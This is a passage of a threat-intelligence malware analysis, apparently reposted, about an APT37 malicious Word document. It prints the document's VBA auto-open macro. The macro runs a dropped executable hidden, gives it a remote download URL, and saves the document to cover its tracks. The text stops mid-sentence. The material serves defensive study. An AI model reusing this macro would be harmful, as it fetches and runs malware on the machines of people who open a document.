lazarusholic

Everyday is lazarus.dayβ

APT 37 strike again ?

2020-04-23, StrangerealIntel
https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/North%20Korea/APT/APT37/2020-04-23/Analysis.md
#APT37

Contents

## APT 37 strike again ?
## Table of Contents
* [Malware analysis](#Malware-analysis)
* [Cyber kill chain](#Cyber-kill-chain)
* [Indicators Of Compromise (IOC)](#IOC)
* [References MITRE ATT&CK Matrix](#Ref-MITRE-ATTACK)
* [Links](#Links)
+ [Original Tweet](#tweet)
+ [Link Anyrun](#Links-Anyrun)
+ [Articles](#Articles)

<h2>Malware analysis <a name="Malware-analysis"></a></h2>
<h6>The initial vector is an maldoc with a macro. This launches an auto-open method for decrypt the next stager, save it and execute it in push as argument the URL to contact. This saves the modification on the document for avoiding to be executing a second time by the victim.</h6>

```vb
Private Sub Document_Open()
Dim n As Long
Dim cLine As String
Dim path As String
If Image1.Width > 2 And Image1.Height > 2 Then
Image1.Width = 1
Image1.Height = 1
Image2.AutoSize = True
With ActiveDocument.Content
.Font.ColorIndex = wdBlack
End With
path = save2file()
cLine = "cmd /c cd /d %USERPROFILE% && ren up.txt up.exe && up http://mydownload-202001.c1.biz"
n = Shell(cLine, vbHide)
End If
ActiveDocument.Save
End Sub
```

<h6>The called method parsed …